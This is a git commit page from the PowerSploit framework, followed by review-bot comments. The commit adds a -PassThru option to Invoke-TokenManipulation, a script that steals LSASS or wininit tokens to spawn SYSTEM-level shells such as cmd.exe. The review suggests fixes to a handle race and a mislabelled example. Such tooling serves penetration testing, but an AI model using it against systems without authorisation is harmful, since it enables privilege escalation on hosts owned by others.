author | Matt Graeber <mattgraeber@gmail.com> | 2014-10-01 20:49:35 -0400 |
---|---|---|
committer | Matt Graeber <mattgraeber@gmail.com> | 2014-10-01 20:49:35 -0400 |
commit | 4daac216c881d6e6750a2b3daadf77266ab1eb83 (patch) | |
tree | 21924fec1249fed68210e1233dc9cb1b58455a70 /Exfiltration | |
parent | 0ca33b03479f16b572c8991285ca36b4574a1822 (diff) | |
parent | ba02a116872c52103e02e8da0c037911cb1a2309 (diff) | |
download | PowerSploit-4daac216c881d6e6750a2b3daadf77266ab1eb83.tar.gz PowerSploit-4daac216c881d6e6750a2b3daadf77266ab1eb83.zip |
Merge pull request #56 from clymb3r/master
Added -PassThru to Invoke-TokenManipulation
Diffstat (limited to 'Exfiltration')
-rw-r--r-- | Exfiltration/Invoke-TokenManipulation.ps1 | 40 |
1 files changed, 35 insertions, 5 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1
index 8c8b7b4..7bfce3b 100644
--- a/Exfiltration/Invoke-TokenManipulation.ps1
+++ b/Exfiltration/Invoke-TokenManipulation.ps1
@@ -49,7 +49,8 @@ Author: Joe Bialek, Twitter: @JosephBialek
 License: BSD 3-Clause
 Required Dependencies: None
 Optional Dependencies: None
-Version: 1.1
+Version: 1.11
+(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe)
 .DESCRIPTION
@@ -106,6 +107,10 @@ If you are creating a process which doesn't need a UI to be rendered, use this f
 current user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control to "Everyone".
+.PARAMETER PassThru
+
+If you are creating a process, this will pass the System.Diagnostics.Process object to the pipeline.
+
 .EXAMPLE
@@ -151,6 +156,12 @@ Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Ge
 .EXAMPLE
+(Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" -PassThru).WaitForExit()
+
+Spawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited.
+
+.EXAMPLE
+
 Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser
 Makes the current thread impersonate the lsass security token.
@@ -220,7 +231,11 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
 [Parameter(ParameterSetName = "CreateProcess")]
 [Switch]
- $NoUI
+ $NoUI,
+
+ [Parameter(ParameterSetName = "CreateProcess")]
+ [Switch]
+ $PassThru
 )
 Set-StrictMode -Version 2
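Review bot: The explanation under the new .EXAMPLE in the -151 hunk says the process is spawned "using the primary token of LSASS.exe", but the command it documents pipes `Get-Process wininit`, so the prose and the command disagree. It looks copied from the preceding example, whose hunk-header context carries the same LSASS wording; the new text should name the process the command actually targets, e.g. `Spawns cmd.exe using the primary token of wininit.exe, then blocks the calling PowerShell session until that process exits.` The -106 and -220 hunks (parameter help and the `$PassThru` switch declaration) read fine as documentation of the new switch.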
@@ -1549,7 +1564,11 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
 [Parameter(Position=2)]
 [String]
- $ProcessArgs
+ $ProcessArgs,
+
+ [Parameter(Position=3)]
+ [Switch]
+ $PassThru
 )
 Write-Verbose "Entering Create-ProcessWithToken"
 #Duplicate the token so it can be used to create a new process
@@ -1600,6 +1619,18 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
 $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION)
 $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null
 $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null
+
+ #Pass created System.Diagnostics.Process object to pipeline
+ if ($PassThru) {
+ #Retrieving created System.Diagnostics.Process object
+ $returnProcess = Get-Process -Id $ProcessInfo.dwProcessId
+
+ #Caching process handle so we don't lose it when the process exits
+ $null = $returnProcess.Handle
+
+ #Passing System.Diagnostics.Process object to pipeline
+ $returnProcess
+ }
 }
 else
 {
@@ -1841,7 +1872,7 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
 Set-DesktopACLs
 }
- Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs
+ Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs -PassThru:$PassThru
 Invoke-RevertToSelf
 }
@@ -1880,4 +1911,3 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
 #Start the main function
 Main
 }
-
|
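Review bot: In the -1600 hunk the new PassThru block runs after `$CloseHandle.Invoke($ProcessInfo.hProcess)` and `$CloseHandle.Invoke($ProcessInfo.hThread)` have already been called, so when `Get-Process -Id $ProcessInfo.dwProcessId` executes the script no longer holds any handle to the process it just created. If that process has already exited, its PID is free for reuse and Get-Process may return an unrelated process; if nothing has that PID, Get-Process raises only a non-terminating error, `$returnProcess` is never assigned, and under the `Set-StrictMode -Version 2` set earlier in the file the next line `$null = $returnProcess.Handle` becomes a terminating error even though process creation succeeded. Closing hProcess after the PassThru block keeps the kernel process object alive across the lookup (Windows does not recycle a PID while a handle to the process is open), and `-ErrorAction Stop` inside a try/catch makes a failed lookup an explicit warning rather than a half-finished return. Create-ProcessWithToken begins before this hunk and its else branch continues after it.

```powershell
$ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION)
$CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null

#Pass created System.Diagnostics.Process object to pipeline. hProcess is still open here,
#so the new process's PID cannot be recycled before Get-Process resolves it.
if ($PassThru) {
    try {
        $returnProcess = Get-Process -Id $ProcessInfo.dwProcessId -ErrorAction Stop

        #Caching process handle so we don't lose it when the process exits
        $null = $returnProcess.Handle

        $returnProcess
    }
    catch {
        Write-Warning "Process $($ProcessInfo.dwProcessId) was created but could not be retrieved for -PassThru: $_"
    }
}

$CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null
```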